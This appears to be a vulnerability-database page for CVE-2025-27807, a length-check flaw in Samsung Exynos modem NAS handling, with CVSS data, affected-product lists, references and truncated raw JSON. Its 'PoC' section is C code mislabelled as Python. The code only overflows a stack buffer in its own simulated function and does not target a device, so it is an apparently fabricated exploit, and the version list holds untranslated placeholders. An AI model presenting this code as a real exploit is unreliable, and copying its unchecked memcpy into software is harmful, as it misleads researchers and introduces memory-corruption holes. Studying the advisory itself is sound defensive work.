CVE-2025-27807

Description

An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400. The lack of a length check leads to out-of-bounds writes via malformed NAS packets.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_990_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_990:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_2100_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_2100:-:*:*:*:*:*:*:* - NOT VULNERABLE

Exynos 980 < 修复版本

Exynos 990 < 修复版本

Exynos 850 < 修复版本

Exynos 1080 < 修复版本

Exynos 2100 < 修复版本

Exynos 1280 < 修复版本

Exynos 2200 < 修复版本

Exynos 1330 < 修复版本

Exynos 1380 < 修复版本

Exynos 1480 < 修复版本

Exynos 2400 < 修复版本

Exynos 1580 < 修复版本

Exynos 9110 < 修复版本

Exynos W920 < 修复版本

Exynos W930 < 修复版本

Exynos W1000 < 修复版本

Modem 5123 < 修复版本

Modem 5300 < 修复版本

Modem 5400 < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-27807 PoC - Malformed NAS Packet Generator
// This PoC demonstrates the vulnerability in Samsung Exynos NAS protocol handling

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// NAS Message Header Structure
typedef struct {
    uint8_t protocol_discriminator;
    uint8_t security_header_type;
    uint16_t message_type;
    uint32_t length;  // This field is not properly validated
} nas_header_t;

// Craft malformed NAS packet with excessive length
unsigned char* craft_malformed_nas_packet(uint32_t declared_length) {
    unsigned char* packet = malloc(declared_length + sizeof(nas_header_t));
    if (!packet) return NULL;
    
    nas_header_t* header = (nas_header_t*)packet;
    header->protocol_discriminator = 0x07;  // 5GS mobility management
    header->security_header_type = 0x00;
    header->message_type = 0x00;
    header->length = declared_length;  // Declared length > actual buffer
    
    // Fill payload with pattern to trigger overflow
    unsigned char* payload = packet + sizeof(nas_header_t);
    memset(payload, 0x41, declared_length);  // Overflow data
    
    return packet;
}

// Simulate vulnerable NAS processing
void process_nas_message(unsigned char* data, uint32_t declared_len) {
    // Vulnerable: No validation that declared_len matches actual data
    uint32_t buffer_size = 256;  // Fixed small buffer
    unsigned char buffer[256];
    
    // Vulnerability: memcpy without length check
    memcpy(buffer, data, declared_len);  // Can overflow buffer
}

int main() {
    printf("CVE-2025-27807 PoC - NAS Packet Overflow\n");
    printf("Target: Samsung Exynos Processors\n\n");
    
    // Craft packet with length exceeding buffer size
    uint32_t malicious_length = 1024;  // Much larger than buffer
    unsigned char* malicious_packet = craft_malformed_nas_packet(malicious_length);
    
    if (malicious_packet) {
        printf("Malformed NAS packet crafted:\n");
        printf("  Declared Length: %u bytes\n", malicious_length);
        printf("  Actual Buffer: 256 bytes\n");
        printf("  Overflow Size: %u bytes\n", malicious_length - 256);
        
        // Trigger vulnerability
        process_nas_message(malicious_packet, malicious_length);
        
        free(malicious_packet);
    }
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27807
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27807
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27807/
[4] VulDB https://vuldb.com/cve/CVE-2025-27807
[5] https://semiconductor.samsung.com/support/quality-support/product-security-updates/
[6] https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-27807/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27807", "sourceIdentifier": "[email protected]", "published": "2026-01-05T19:15:55.933", "lastModified": "2026-01-09T14:14:39.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 9110, W920, W930, W1000, Modem 5123, Modem 5300, Modem 5400. The lack of a length check leads to out-of-bounds writes via malformed NAS packets."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_990_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BCF6C91D-DECE-4630-85FE-C22EF2B9160A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_990:-:*:*:*:*:*:*:*", "matchCriteriaId": "87FE8214-E165-4874-BB5A-3C4298708039"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F18F62E-2012-442E-BE60-6E76325D1824"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D8701B6-6989-44D1-873A-A1823BFD7CCC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1928760C-4FC4-45B0-84FF-C1105CD1DD2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB410A6D-642B-49AE-8B1C-EADA953A84DA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "43DE4D6F-D662-46F2-93BC-9AE950320BDE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:*", "matchCriteriaId": "EE06CD56-8BFD-4208-843A-179E3E6F5C10"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "89B88BFE-3C82-498C-8EC1-5784836DB1A1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9385885D-654A-496E-8029-7C6D9B077193"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1A7B09-9031-4E54-A24F-3237C054166B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:*", "matchCriteriaId": "DFC68046-2F08-40D1-B158-89D8D9263541"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "63C0D9AC-BD23-48C9-83E7-301DEC06E583"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "A72ADEBB-ED72-4A5B-BB27-95EDE43F8116"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2635646-DD6A-4735-8E01-F45445584832"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA0F8A58-71B7-4503-A03A-6FB4282D75BD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D381478B-C638-4663-BD71-144BE4B02E46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:* ... (truncated)